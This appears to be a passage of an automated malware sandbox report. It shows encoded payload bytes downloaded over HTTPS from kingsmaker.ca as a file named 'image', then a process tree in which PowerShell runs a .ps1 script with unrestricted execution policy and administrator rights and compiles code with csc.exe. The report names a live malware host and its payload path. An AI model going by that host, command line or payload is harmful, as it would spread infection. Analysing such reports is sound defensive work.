                                                                                                            2024-11-29 08:10:27 UTC1369INData Raw: 07 c4 4f 07 c2 42 6e cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 87 67 4f 07 c2 4a 44 42 e9 4f 07 c4 4f 07 c2 42 46 cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 88 67 4f 07 c2 4a b4 43 e9 4f 07 c4 4f 07 c2 42 be ce 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 88 67 4f 07 c2 4a ac 43 e9 4f 07 c4 4f 07 c2 42 96 ce 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 88 67 4f 07 c2 4a 84 43 e9 4f 07 c4 4f 07 c2 42 8e ce 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 88 67 4f 07 c2 4a 9c 43 e9 4f 07 c4 4f 07 c2 42 e6 ce 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 88 67 4f 07 c2 4a 84 43 e9 4f 07 c4 4f 07 c2 42 de ce 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 88 67 4f 07 c2 4a fc 43 e9 4f 07 c4 4f 07 c2 42 36 ce 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 88 67 4f 07 c2 4a ec 43 e9
                                                                                                            Data Ascii: OBnOvO:NEgOJDBOOBFOvO:NgOJCOOBOvO:NgOJCOOBOvO:NgOJCOOBOvO:NgOJCOOBOvO:N%gOJCOOBOvO:NgOJCOOB6OvO:NegOJC
                                                                                                            2024-11-29 08:10:27 UTC1369INData Raw: 07 c2 4a 7c 45 e9 4f 07 c4 4f 07 c2 42 fe 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 8d 67 4f 07 c2 4a 54 45 e9 4f 07 c4 4f 07 c2 42 d6 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 8d 67 4f 07 c2 4a 4c 45 e9 4f 07 c4 4f 07 c2 42 c6 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 8d 67 4f 07 c2 4a a4 46 e9 4f 07 c4 4f 07 c2 42 36 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 8d 67 4f 07 c2 4a 9c 46 e9 4f 07 c4 4f 07 c2 42 de 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 8d 67 4f 07 c2 4a f4 46 e9 4f 07 c4 4f 07 c2 42 c6 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 8d 67 4f 07 c2 4a ec 46 e9 4f 07 c4 4f 07 c2 42 3e 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 8e 67 4f 07 c2 4a ec 46 e9 4f 07 c4 4f 07 c2 42 16 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 8e 67
                                                                                                            Data Ascii: J|EOOB1OvO:NgOJTEOOB1OvO:NgOJLEOOB1OvO:N%gOJFOOB61OvO:NgOJFOOB1OvO:NegOJFOOB1OvO:NEgOJFOOB>1OvO:NgOJFOOB1OvO:Ng
                                                                                                            2024-11-29 08:10:27 UTC1369INData Raw: c4 9f a6 25 f2 67 4f 07 c2 4a 34 48 e9 4f 07 c4 4f 07 c2 42 76 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 f2 67 4f 07 c2 4a 3c 48 e9 4f 07 c4 4f 07 c2 42 6e 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 f2 67 4f 07 c2 4a 2c 48 e9 4f 07 c4 4f 07 c2 42 46 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 f2 67 4f 07 c2 4a 14 48 e9 4f 07 c4 4f 07 c2 42 be 32 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 f3 67 4f 07 c2 4a 0c 48 e9 4f 07 c4 4f 07 c2 42 96 32 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 f3 67 4f 07 c2 4a 64 48 e9 4f 07 c4 4f 07 c2 42 8e 32 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 f3 67 4f 07 c2 4a 54 48 e9 4f 07 c4 4f 07 c2 42 e6 32 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 f3 67 4f 07 c2 4a 4c 48 e9 4f 07 c4 4f 07 c2 42 de 32 17 4f 07 cc 76 4f 3a 4e 8c
                                                                                                            Data Ascii: %gOJ4HOOBv1OvO:NgOJ<HOOBn1OvO:NegOJ,HOOBF1OvO:NEgOJHOOB2OvO:NgOJHOOB2OvO:NgOJdHOOB2OvO:NgOJTHOOB2OvO:NgOJLHOOB2OvO:N
                                                                                                            2024-11-29 08:10:27 UTC1369INData Raw: cc 76 4f 3a 4e 8c 07 c4 9f a6 45 f7 67 4f 07 c2 4a 0c 49 e9 4f 07 c4 4f 07 c2 42 ae 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 f8 67 4f 07 c2 4a 0c 49 e9 4f 07 c4 4f 07 c2 42 9e 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 f8 67 4f 07 c2 4a 64 49 e9 4f 07 c4 4f 07 c2 42 8e 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 f8 67 4f 07 c2 4a 54 49 e9 4f 07 c4 4f 07 c2 42 e6 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 f8 67 4f 07 c2 4a 5c 49 e9 4f 07 c4 4f 07 c2 42 de 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 f8 67 4f 07 c2 4a 44 49 e9 4f 07 c4 4f 07 c2 42 36 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 f8 67 4f 07 c2 4a bc 4a e9 4f 07 c4 4f 07 c2 42 2e 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 f8 67 4f 07 c2 4a 94 4a e9 4f 07 c4 4f 07 c2 42 06 35 17 4f
                                                                                                            Data Ascii: vO:NEgOJIOOB5OvO:NgOJIOOB5OvO:NgOJdIOOB5OvO:NgOJTIOOB5OvO:NgOJ\IOOB5OvO:N%gOJDIOOB65OvO:NgOJJOOB.5OvO:NegOJJOOB5O
                                                                                                            2024-11-29 08:10:27 UTC1369INData Raw: c2 42 2e 38 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 fd 67 4f 07 c2 4a 5c 4c e9 4f 07 c4 4f 07 c2 42 16 38 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 fd 67 4f 07 c2 4a b4 4d e9 4f 07 c4 4f 07 c2 42 0e 38 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 fd 67 4f 07 c2 4a ac 4d e9 4f 07 c4 4f 07 c2 42 66 38 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 fd 67 4f 07 c2 4a 84 4d e9 4f 07 c4 4f 07 c2 42 5e 38 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 fd 67 4f 07 c2 4a f4 4d e9 4f 07 c4 4f 07 c2 42 b6 39 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 fd 67 4f 07 c2 4a ec 4d e9 4f 07 c4 4f 07 c2 42 46 38 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 fe 67 4f 07 c2 4a c4 4d e9 4f 07 c4 4f 07 c2 42 be 39 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 fe 67 4f 07 c2 4a ec 4d e9 4f 07 c4 4f
                                                                                                            Data Ascii: B.8OvO:NgOJ\LOOB8OvO:NgOJMOOB8OvO:N%gOJMOOBf8OvO:NgOJMOOB^8OvO:NegOJMOOB9OvO:NEgOJMOOBF8OvO:NgOJMOOB9OvO:NgOJMOO


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            22192.168.11.3049766172.67.179.67443
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:11:30 UTC70OUTGET /StaticFile/TermServiceTryRun/72 HTTP/1.1
                                                                                                            Host: kingsmaker.ca
                                                                                                            2024-11-29 08:11:30 UTC1161INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:11:30 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 2183168
                                                                                                            Connection: close
                                                                                                            content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                            hash: BFF2365257251B6BA227A5E748DBD62E
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILZXZ7KRJflqHKQfM2e5Gri7cEuSKiEQ2UEhW6w4zT%2Fam%2FnW1RQUYCzzBwiMrPJFVdNXF12NVEJlar%2F77jS9Of7xITp21Cb6Seja4yii72dXcpoNjSnSO%2BcH4HfjuYioUgVxvvSGHr5V"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21717&min_rtt=1130&rtt_var=28794&sent=13911&recv=6880&lost=0&retrans=0&sent_bytes=19701307&recv_bytes=112692&delivery_rate=25002253&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea1209bf8a10add-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158841&min_rtt=158631&rtt_var=33784&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=708&delivery_rate=24047&cwnd=252&unsent_bytes=0&cid=9d9a4b6b18669a61&ts=725&x=0"
                                                                                                            2024-11-29 08:11:30 UTC208INData Raw: 05 12 18 48 4a 48 48 48 4c 48 47 48 b7 b7 48 48 f0 48 48 48 48 48 48 48 08 48 52 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 49 48 48 f2 58 48 46 57 fc 41 85 69 f0 49 04 85 69 d8 d8 1c 20 21 3b 68 38 3a 27 2f 3a 29 25 68 25 3d 3b 3c 68 2a 2d 68 3a 3d 26 68 3d 26 2c 2d 3a 68 1f 21 26 7b 7a 45 42 6c 7f 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48
                                                                                                            Data Ascii: HJHHHLHGHHHHHHHHHHHRHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIHHXHFWAiIi !;h8:'/:)%h%=;<h*-h:=&h=&,-:h!&{zEBlHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
                                                                                                            2024-11-29 08:11:30 UTC1369INData Raw: 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 18 0d 48 48 04 49 43 48 7c 10 a6 2e 48 48 48 48 48 48 48 48 a8 48 4a 49 43 49 4a 51 48 44 46 48 48 08 5b 48 48 48 48 48 34 45 46 48 48 58 48 48 48 78 46 48 48 48 08 48 48 58 48 48 48 4a 48 48 4e 48 48 48 48 48 48 48 4e 48 48 48 48 48 48 48 48 78 6a 48 48 4c 48 48 48 48 48 48 4b 48 08 c9 48 48 58 48 48 08 48 48 48 48 58 48 48 58 48 48 48 48 48 48 58 48 48 48 48 58 47 48 39 48 48 48 48 a8 46 48 4c 59 48 48 48 d8 58 48 48 d4 59 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 08 47 48 44 03 49 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 78 47 48 50 48 48 48 48 48 48 48 48 48 48
                                                                                                            Data Ascii: HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHICH|.HHHHHHHHHJICIJQHDFHH[HHHHH4EFHHXHHHxFHHHHHXHHHJHHNHHHHHHHNHHHHHHHHxjHHLHHHHHHKHHHXHHHHHHXHHXHHHHHHXHHHHXGH9HHHHFHLYHHHXHHYHHHHHHHHHHHHHHHHHHGHDIHHHHHHHHHHHHHHHHHHHHHHHHHHxGHPHHHHHHHHHH
                                                                                                            2024-11-29 08:11:30 UTC1369INData Raw: 5a 08 48 4b 40 0a 31 3c 2d 0a 27 27 24 48 48 48 48 c8 b7 b7 b7 37 60 5a 08 48 4d 0e 29 24 3b 2d 4c 1c 3a 3d 2d 4e 1b 31 3b 3c 2d 25 4a 48 48 14 5a 08 48 4b 40 1f 27 3a 2c 0a 27 27 24 4a 48 48 48 c8 b7 b7 b7 37 10 5a 08 48 4d 0e 29 24 3b 2d 4c 1c 3a 3d 2d 4e 1b 31 3b 3c 2d 25 4a 48 48 c4 5a 08 48 4b 40 04 27 26 2f 0a 27 27 24 4c 48 48 48 c8 b7 b7 b7 37 c0 5a 08 48 4d 0e 29 24 3b 2d 4c 1c 3a 3d 2d 4e 1b 31 3b 3c 2d 25 4a 48 48 f4 5a 08 48 5a 4e 3b 3c 3a 21 26 2f 4a 48 48 48 84 5a 08 48 43 42 1f 21 2c 2d 1b 3c 3a 21 26 2f 4a 48 48 48 a8 5a 08 48 42 42 09 26 3b 21 1b 3c 3a 21 26 2f 48 48 4a 48 bc 5a 08 48 44 4f 1e 29 3a 21 29 26 3c 4a 48 48 4c 5b 08 48 44 42 07 24 2d 1e 29 3a 21 29 26 3c 4a 48 48 48 50 5b 08 48 5b 4e 1c 0b 24 29 3b 3b d4 57 08 48 4a 48 48 48
                                                                                                            Data Ascii: ZHK@1<-''$HHHH7`ZHM)$;-L:=-N1;<-%JHHZHK@':,''$JHHH7ZHM)$;-L:=-N1;<-%JHHZHK@'&/''$LHHH7ZHM)$;-L:=-N1;<-%JHHZHZN;<:!&/JHHHZHCB!,-<:!&/JHHHZHBB&;!<:!&/HHJHZHDO):!)&<JHHL[HDB$-):!)&<JHHHP[H[N$);;WHJHHH
                                                                                                            2024-11-29 08:11:30 UTC1369INData Raw: 08 48 0c 48 bc b7 88 50 08 48 0a 48 bc b7 ac 50 08 48 0a 48 bc b7 45 51 08 48 0b 48 bc b7 03 51 08 48 0a 48 bc b7 32 51 08 48 0a 48 bc b7 eb 51 08 48 0b 48 bc b7 9f 51 08 48 0b 48 bc b7 58 52 08 48 0b 48 bc b7 73 52 08 48 0b 48 bc b7 2c 52 08 48 0b 48 bc b7 d8 52 08 48 0b 48 bc b7 84 52 08 48 0b 48 bc b7 4f 53 08 48 0b 48 bc b7 0a 53 08 48 0b 48 bc b7 c0 53 08 48 0b 48 bc b7 8d 53 08 48 0a 48 bc b7 b7 53 08 48 0a 48 bc b7 71 54 08 48 0a 48 bc b7 37 54 08 48 0b 48 bc b7 f5 54 08 48 0b 48 bc b7 a6 54 08 48 0b 48 bc b7 69 55 08 48 0b 48 bc b7 1d 55 08 48 02 48 bd b7 c0 55 08 48 02 48 be b7 fb 55 08 48 02 48 bf b7 ae 55 08 48 02 48 b0 b7 09 56 08 48 02 48 b1 b7 3a 56 08 48 02 48 b2 b7 eb 56 08 48 02 48 b3 b7 94 56 08 48 02 48 b4 b7 53 57 08 48 03 48 b5 b7 0e
                                                                                                            Data Ascii: HHPHHPHHEQHHQHH2QHHQHHQHHXRHHsRHH,RHHRHHRHHOSHHSHHSHHSHHSHHqTHH7THHTHHTHHiUHHUHHUHHUHHUHHVHH:VHHVHHVHHSWHH
                                                                                                            2024-11-29 08:11:30 UTC1369INData Raw: 40 48 49 48 48 48 48 48 48 48 4c 1b 2d 24 2e 4a 48 4a 48 7b 48 98 d8 08 48 40 1d 26 21 3c 06 29 25 2d 4b 48 f0 5a 08 48 40 48 4a 48 48 48 48 48 48 48 4c 1b 2d 24 2e 4a 48 08 f0 5a 08 48 49 48 49 49 4a 48 4a 48 7c 48 70 d9 08 48 41 1d 26 21 3c 1b 2b 27 38 2d 4b 48 f0 5a 08 48 40 48 4a 48 48 48 48 48 48 48 4c 1b 2d 24 2e 4a 48 08 f0 5a 08 48 49 48 49 49 4a 48 4a 48 7b 48 54 d8 08 48 4e 0d 39 3d 29 24 3b 4b 48 48 58 08 48 40 48 4a 40 d4 57 08 48 48 48 4c 1b 2d 24 2e 4a 48 40 d4 57 08 48 49 48 4b 07 2a 22 4a 48 4a 48 63 48 6c d8 08 48 43 0f 2d 3c 00 29 3b 20 0b 27 2c 2d 4b 48 d4 58 08 48 40 48 49 40 d4 57 08 48 48 48 4c 1b 2d 24 2e 4a 48 4a 48 7b 48 44 db 08 48 40 1c 27 1b 3c 3a 21 26 2f 4b 48 f0 5a 08 48 40 48 4a 40 d4 57 08 48 48 48 4c 1b 2d 24 2e 4a 48 08
                                                                                                            Data Ascii: @HIHHHHHHHL-$.JHJH{HH@&!<)%-KHZH@HJHHHHHHHL-$.JHZHIHIIJHJH|HpHA&!<+'8-KHZH@HJHHHHHHHL-$.JHZHIHIIJHJH{HTHN9=)$;KHHXH@HJ@WHHHL-$.JH@WHIHK*"JHJHcHlHC-<); ',-KHXH@HI@WHHHL-$.JHJH{HDH@'<:!&/KHZH@HJ@WHHHL-$.JH
                                                                                                            2024-11-29 08:11:30 UTC1369INData Raw: 4f 59 1e 27 24 29 3c 21 24 2d 09 3c 3c 3a 21 2a 3d 3c 2d 50 6a 08 48 7c 68 08 48 48 48 4e 1b 31 3b 3c 2d 25 48 48 48 48 4a 48 48 48 f0 6a 08 48 48 48 48 48 48 48 48 48 48 48 48 48 14 6b 08 48 48 48 48 48 f0 6a 08 48 48 48 48 48 86 6a 08 48 40 48 48 48 8c 57 08 48 54 d8 08 48 6c d8 08 48 44 db 08 48 4c db 08 48 6c db 08 48 60 db 08 48 64 db 08 48 68 db 08 48 a4 c5 08 48 4c c6 08 48 b8 c6 08 48 48 48 4a 48 96 6a 08 48 0c 48 bc b7 5b 6b 08 48 0c 48 bc b7 48 48 47 00 18 18 0f 0d 06 09 3c 3c 3a 21 2a 3d 3c 2d 7d 48 50 34 08 48 4e 0b 3a 2d 29 3c 2d 4b 48 48 48 48 48 40 48 4a 40 10 6b 08 48 48 48 4c 1b 2d 24 2e 4a 48 4a f0 5a 08 48 4a 48 4d 09 0c 29 3c 29 4a 48 4a 48 0c 48 70 34 08 48 4e 0b 3a 2d 29 3c 2d 4b 48 48 48 48 48 44 48 4b 40 10 6b 08 48 48 48 4c 1b 2d
                                                                                                            Data Ascii: OY'$)<!$-<<:!*=<-PjH|hHHHN1;<-%HHHHJHHHjHHHHHHHHHHHHHkHHHHHjHHHHHjH@HHHWHTHlHDHLHlH`HdHhHHLHHHHJHjHH[kHHHHG<<:!*=<-}HP4HN:-)<-KHHHHH@HJ@kHHHL-$.JHJZHJHM)<)JHJHHp4HN:-)<-KHHHHHDHK@kHHHL-
                                                                                                            2024-11-29 08:11:30 UTC1369INData Raw: 48 48 cb 0c 6c 4c b0 a1 c3 a8 48 48 cb 0c 6c 4c b0 a1 d5 a8 48 48 84 cd 6f 08 48 c7 6f 08 48 d1 6f 08 48 49 48 48 48 48 48 48 48 48 48 48 48 88 48 48 48 48 48 48 0e ec 6f 08 48 40 48 48 48 48 48 48 48 a0 6e 08 48 64 60 08 48 f8 6f 08 48 48 48 48 48 48 48 48 48 5c 61 08 48 64 60 08 48 1b 60 08 48 48 48 48 48 39 60 08 48 58 48 48 48 6c 5f 08 48 54 d8 08 48 6c d8 08 48 44 db 08 48 4c db 08 48 84 4f 09 48 90 4f 09 48 64 db 08 48 68 db 08 48 a4 4f 09 48 4c c6 08 48 b8 c6 08 48 48 48 48 48 48 48 49 48 49 d4 58 08 48 4c 48 48 48 41 0e 1a 2d 2e 0b 27 3d 26 3c 44 48 78 6a 08 48 98 c6 08 48 48 48 48 48 4b 48 cb 60 08 48 02 48 b1 b7 fc 60 08 48 02 48 b2 b7 ad 60 08 48 03 48 b5 b7 48 48 59 1c 01 26 3c 2d 3a 2e 29 2b 2d 2c 07 2a 22 2d 2b 3c 79 48 84 4f 09 48 59 09 2e
                                                                                                            Data Ascii: HHlLHHlLHHoHoHoHIHHHHHHHHHHHHHHHHHoH@HHHHHHHnHd`HoHHHHHHHHH\aHd`H`HHHHH9`HXHHHl_HTHlHDHLHOHOHdHhHOHLHHHHHHHHIHIXHLHHHA-.'=&<DHxjHHHHHHKH`HH`HH`HHHHY&<-:.)+-,*"-+<yHOHY.
                                                                                                            2024-11-29 08:11:30 UTC1369INData Raw: 48 48 48 48 48 4a 4d 1e 1c 31 38 2d 4a 48 84 58 08 48 4a 48 48 48 4a 41 1a 2d 3b 2d 3a 3e 2d 2c 79 4a 48 84 58 08 48 4c 48 48 48 4a 41 1a 2d 3b 2d 3a 3e 2d 2c 7a 4a 48 84 58 08 48 4e 48 48 48 4a 41 1a 2d 3b 2d 3a 3e 2d 2c 7b 4a 48 c8 58 08 48 40 48 48 48 4a 41 1e 1b 25 29 24 24 01 26 3c 4a 48 d4 58 08 48 40 48 48 48 4a 40 1e 01 26 3c 2d 2f 2d 3a 4a 48 c4 59 08 48 40 48 48 48 4a 4f 1e 1b 21 26 2f 24 2d 4a 48 f8 59 08 48 40 48 48 48 4a 4f 1e 0c 27 3d 2a 24 2d 4a 48 98 59 08 48 40 48 48 48 4a 41 1e 0b 3d 3a 3a 2d 26 2b 31 4a 48 68 63 08 48 40 48 48 48 4a 4d 1e 0c 29 3c 2d 4a 48 58 5a 08 48 40 48 48 48 4a 4f 1e 07 24 2d 1b 3c 3a 4a 48 48 59 08 48 40 48 48 48 4a 41 1e 0c 21 3b 38 29 3c 2b 20 4a 48 60 5b 08 48 40 48 48 48 4a 4e 1e 0d 3a 3a 27 3a 4a 48 10 5a 08
                                                                                                            Data Ascii: HHHHHJM18-JHXHJHHHJA-;-:>-,yJHXHLHHHJA-;-:>-,zJHXHNHHHJA-;-:>-,{JHXH@HHHJA%)$$&<JHXH@HHHJ@&<-/-:JHYH@HHHJO!&/$-JHYH@HHHJO'=*$-JHYH@HHHJA=::-&+1JHhcH@HHHJM)<-JHXZH@HHHJO$-<:JHHYH@HHHJA!;8)<+ JH`[H@HHHJN::':JHZ
                                                                                                            2024-11-29 08:11:30 UTC1369INData Raw: 48 4e 0b 3a 2d 29 3c 2d 48 48 48 48 48 48 49 48 1c 59 08 48 4e 09 1e 29 24 3d 2d 4a 48 4a 48 42 f8 43 09 48 4e 0b 3a 2d 29 3c 2d 48 48 48 48 48 48 49 48 48 59 08 48 4e 09 1e 29 24 3d 2d 4a 48 4a 48 40 fc 43 09 48 41 1c 27 18 27 21 26 3c 2d 3a 48 48 48 59 08 48 48 4a 48 40 f0 43 09 48 41 1c 27 01 26 3c 2d 2f 2d 3a 48 48 1c 59 08 48 48 4a 48 43 f4 43 09 48 44 6e 27 38 17 0d 39 3d 29 24 21 3c 31 48 48 48 58 08 48 4a 48 40 7a 08 48 4c 04 2d 2e 3c 4a 48 48 40 7a 08 48 4d 1a 21 2f 20 3c 4a 48 4a 48 43 9c 43 09 48 46 6e 27 38 17 01 26 2d 39 3d 29 24 21 3c 31 48 48 48 58 08 48 4a 48 40 7a 08 48 4c 04 2d 2e 3c 4a 48 48 40 7a 08 48 4d 1a 21 2f 20 3c 4a 48 4a 48 48 3c 7b 08 48 48 48 48 48 48 48 48 48 48 48 48 48 9c 02 08 48 48 48 48 48 3c 7b 08 48 48 48 48 48 da 7d
                                                                                                            Data Ascii: HN:-)<-HHHHHHIHYHN)$=-JHJHBCHN:-)<-HHHHHHIHHYHN)$=-JHJH@CHA''!&<-:HHHYHHJH@CHA'&<-/-:HHYHHJHCCHDn'89=)$!<1HHHXHJH@zHL-.<JHH@zHM!/ <JHJHCCHFn'8&-9=)$!<1HHHXHJH@zHL-.<JHH@zHM!/ <JHJHH<{HHHHHHHHHHHHHHHHHH<{HHHHH}
                                                                                                            2024-11-29 08:11:30 UTC1369INData Raw: 58 08 48 40 48 4d 0b 27 3d 26 3c 4a 48 4a 48 2a 48 98 44 09 48 4c 0b 27 38 31 4b 48 48 48 48 48 58 48 4d 48 48 48 48 48 48 48 4c 1b 2d 24 2e 4a 48 4a 40 7a 08 48 49 48 4b 1b 3a 2b 4a 48 49 84 03 08 48 4a 48 4c 0c 2d 3b 3c 4a 48 48 d4 58 08 48 44 48 42 1b 3c 29 3a 3c 01 26 2c 2d 30 4a 48 48 d4 58 08 48 40 48 4d 0b 27 3d 26 3c 4a 48 4a 48 2a 48 b8 44 09 48 4c 0b 27 38 31 4b 48 48 48 48 48 58 48 4d 48 48 48 48 48 48 48 4c 1b 2d 24 2e 4a 48 4a 4c 04 08 48 49 48 4b 1b 3a 2b 4a 48 48 d4 58 08 48 4a 48 42 1b 3c 29 3a 3c 01 26 2c 2d 30 4a 48 48 40 7a 08 48 44 48 4c 0c 2d 3b 3c 4a 48 48 d4 58 08 48 40 48 4d 0b 27 3d 26 3c 4a 48 4a 48 2a 48 40 45 09 48 4c 0b 27 38 31 4b 48 48 48 48 48 58 48 4d 48 48 48 48 48 48 48 4c 1b 2d 24 2e 4a 48 4a 40 7a 08 48 49 48 4b 1b 3a
                                                                                                            Data Ascii: XH@HM'=&<JHJH*HDHL'81KHHHHHXHMHHHHHHHL-$.JHJ@zHIHK:+JHIHJHL-;<JHHXHDHB<):<&,-0JHHXH@HM'=&<JHJH*HDHL'81KHHHHHXHMHHHHHHHL-$.JHJLHIHK:+JHHXHJHB<):<&,-0JHH@zHDHL-;<JHHXH@HM'=&<JHJH*H@EHL'81KHHHHHXHMHHHHHHHL-$.JHJ@zHIHK:


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:1
                                                                                                            Start time:03:08:54
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_6.ca.ps1"
                                                                                                            Imagebase:0x7ff69c770000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:2
                                                                                                            Start time:03:08:54
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff75b340000
                                                                                                            File size:875'008 bytes
                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:03:08:55
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline"
                                                                                                            Imagebase:0x7ff665030000
                                                                                                            File size:2'759'232 bytes
                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:03:08:55
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEED.tmp" "c:\Users\user\AppData\Local\Temp\lgpiiklc\CSCCB9B20FB8C54707B662B684DAE4C90.TMP"
                                                                                                            Imagebase:0x7ff635540000
                                                                                                            File size:52'744 bytes
                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:03:09:02
                                                                                                            Start date:29/11/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
